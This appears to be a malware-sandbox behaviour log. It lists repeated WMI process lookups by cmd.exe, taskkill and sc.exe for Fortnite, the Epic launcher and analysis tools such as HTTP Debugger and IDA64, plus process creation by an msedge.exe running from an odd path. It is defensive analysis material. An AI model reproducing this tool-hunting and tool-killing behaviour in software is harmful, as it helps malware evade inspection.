                                Source: C:\Windows\System32\cmd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "HTTPDebuggerUI.exe")
                                Source: C:\Windows\System32\sc.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "EpicGamesLauncher.exe")
                                Source: C:\Windows\System32\sc.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "FortniteClient-Win64-Shipping.exe")
                                Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "FortniteClient-Win64-Shipping.exe")
                                Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "FortniteClient-Win64-Shipping.exe")
                                Source: C:\Windows\System32\cmd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "FortniteClient-Win64-Shipping.exe")
                                Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
                                Source: C:\Windows\System32\cmd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
                                Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "EpicGamesLauncher.exe")
                                Source: C:\Windows\System32\cmd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "EpicGamesLauncher.exe")
                                Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
                                Source: C:\Windows\System32\cmd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "EpicGamesLauncher.exe")
                                Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "FortniteClient-Win64-Shipping.exe")
                                Source: C:\Windows\System32\cmd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "EpicGamesLauncher.exe")
                                Source: C:\Windows\System32\cmd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "FortniteClient-Win64-Shipping.exe")
                                Source: C:\Windows\System32\cmd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
                                Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "EpicGamesLauncher.exe")
                                Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
                                Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "FortniteClient-Win64-Shipping.exe")
                                Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
                                Source: C:\Windows\System32\cmd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "FortniteClient-Win64-Shipping.exe")
                                Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
                                Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "FortniteClient-Win64-Shipping.exe")
                                Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "FortniteClient-Win64-Shipping.exe")
                                Source: C:\Windows\System32\cmd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "FortniteClient-Win64-Shipping.exe")
                                Source: C:\Windows\System32\cmd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "FortniteClient-Win64-Shipping.exe")
                                Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "EpicGamesLauncher.exe")
                                Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "EpicGamesLauncher.exe")
                                Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "HTTPDebuggerUI.exe")
                                Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
                                Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "FortniteClient-Win64-Shipping.exe")
                                Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
                                Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "FortniteClient-Win64-Shipping.exe")
                                Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
                                Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
                                Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
                                Source: C:\Windows\System32\cmd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "EpicGamesLauncher.exe")
                                Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "EpicGamesLauncher.exe")
                                Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "EpicGamesLauncher.exe")
                                Source: C:\Windows\System32\cmd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "FortniteClient-Win64-Shipping.exe")
                                Source: C:\Windows\System32\cmd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "EpicGamesLauncher.exe")
                                Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
                                Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
                                Source: C:\Windows\System32\cmd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "EpicGamesLauncher.exe")
                                Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "FortniteClient-Win64-Shipping.exe")
                                Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
                                Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
                                Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
                                Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "EpicGamesLauncher.exe")
                                Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "EpicGamesLauncher.exe")
                                Source: C:\Windows\System32\cmd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "EpicGamesLauncher.exe")
                                Source: C:\Windows\System32\cmd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "FortniteClient-Win64-Shipping.exe")
                                Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
                                Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "FortniteClient-Win64-Shipping.exe")
                                Source: C:\Windows\System32\cmd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "FortniteClient-Win64-Shipping.exe")
                                Source: C:\Windows\System32\cmd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
                                Source: C:\Windows\System32\cmd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "FortniteClient-Win64-Shipping.exe")
                                Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
                                Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "EpicGamesLauncher.exe")
                                Source: C:\Windows\System32\cmd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "FortniteClient-Win64-Shipping.exe")
                                Source: C:\Windows\System32\cmd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
                                Source: C:\Windows\System32\cmd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
                                Source: C:\Windows\System32\cmd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "EpicGamesLauncher.exe")
                                Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
                                Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "FortniteClient-Win64-Shipping.exe")
                                Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "FortniteClient-Win64-Shipping.exe")
                                Source: C:\Windows\System32\cmd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "FortniteClient-Win64-Shipping.exe")
                                Source: C:\Windows\System32\cmd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "FortniteClient-Win64-Shipping.exe")
                                Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
                                Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "Ida64.exe")
                                Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "HTTPDebuggerUI.exe")
                                Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "EpicGamesLauncher.exe")
                                Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "EpicGamesLauncher.exe")
                                Source: C:\Windows\System32\cmd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "FortniteClient-Win64-Shipping.exe")
                                Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "FortniteClient-Win64-Shipping.exe")
                                Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "EpicGamesLauncher.exe")
                                Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "EpicGamesLauncher.exe")
                                Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
                                Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "HTTPDebuggerSvc.exe")
                                Source: C:\Windows\System32\cmd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
                                Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "EpicGamesLauncher.exe")
                                Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "FortniteClient-Win64-Shipping.exe")
                                Source: C:\Windows\System32\cmd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "FortniteClient-Win64-Shipping.exe")
                                Source: C:\Windows\System32\cmd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "FortniteClient-Win64-Shipping.exe")
                                Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "FortniteClient-Win64-Shipping.exe")
                                Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
                                Source: C:\Windows\System32\sc.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "FortniteClient-Win64-Shipping.exe")
                                Source: C:\Windows\System32\cmd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
                                Source: C:\Windows\SysWOW64\cmd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "EpicGamesLauncher.exe")
                                Source: C:\Windows\SysWOW64\cmd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
                                Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "HTTPDebuggerSvc.exe")
                                Source: C:\Windows\System32\cmd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "FortniteClient-Win64-Shipping.exe")
                                Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "EpicGamesLauncher.exe")
                                Source: C:\Windows\System32\cmd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "EpicGamesLauncher.exe")
                                Source: C:\Edge\msedge.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                Source: C:\Edge\msedge.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                Source: C:\Edge\msedge.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                Source: C:\Edge\msedge.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                Source: C:\Edge\msedge.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                Source: C:\Edge\msedge.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                Source: C:\Windows\System32\sc.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "EpicGamesLauncher.exe")
                                Source: C:\Windows\System32\sc.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "HTTPDebuggerSvc.exe")
                                Source: C:\Windows\System32\cmd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "EpicGamesLauncher.exe")
                                Source: C:\Windows\System32\cmd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "Dbg64.exe")
                                Source: C:\Windows\System32\cmd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "FortniteClient-Win64-Shipping.exe")
                                Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
